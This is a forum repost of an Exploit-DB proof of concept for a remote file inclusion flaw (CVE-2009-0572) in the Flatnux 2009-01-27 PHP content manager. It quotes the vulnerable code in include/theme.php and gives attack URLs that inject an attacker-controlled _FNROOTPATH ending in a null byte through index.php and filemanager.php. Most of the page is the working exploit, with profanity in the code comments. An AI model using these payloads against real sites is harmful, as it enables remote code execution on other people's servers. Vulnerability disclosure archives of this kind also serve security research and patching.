Exploit Flatnux 2009-01-27 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7969
Проверка EDB
  1. Пройдено
Автор
ALFONS LUJA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0572
Дата публикации
2009-02-03
Код:
@ flatnux Flatnux-2009-01-27 RFI
  zależności P 
  + Alfons Luja 
  + 2009 
  + grts : All friends
  
  
  VULN : 
       +++ include/theme.php
         ... 
        <?php
          if (eregi("theme.php", $_SERVER['PHP_SELF']))
	     die();                         // 0 <-- I dont give a fuck 
	

             global $theme, $_FNROOTPATH,$lang;   //<-- 1 
             global $forumback, $forumborder;       
             $_FN['table_background']=&$forumback;
             $_FN['table_border']=&$forumborder;


             if ($forumback=="" && $forumborder==""){
	        $forumback="ffffff";
	        $forumborder="000000";
                }
                require_once ($_FNROOTPATH . "themes/$theme/theme.php");

             /*------- Funzioni ridefinibili da theme.php--------------*/
         //......
      +++ /flatnux.php line 116:
            
           //$_FNROOTPATH Still dont have value 
           include_once "./include/theme.php";   //-- 2
          
      +++ /filemanager.php 
          include "./include/flatnux.php"; // -- RFI

  p0c:
     http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00    
     http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
     ... itd ...

  --http://www.wrzuta.pl/audio/xLyg0zckZS/--
  #EÅOF lol

# milw0rm.com [2009-02-03]
 
Источник
www.exploit-db.com

Похожие темы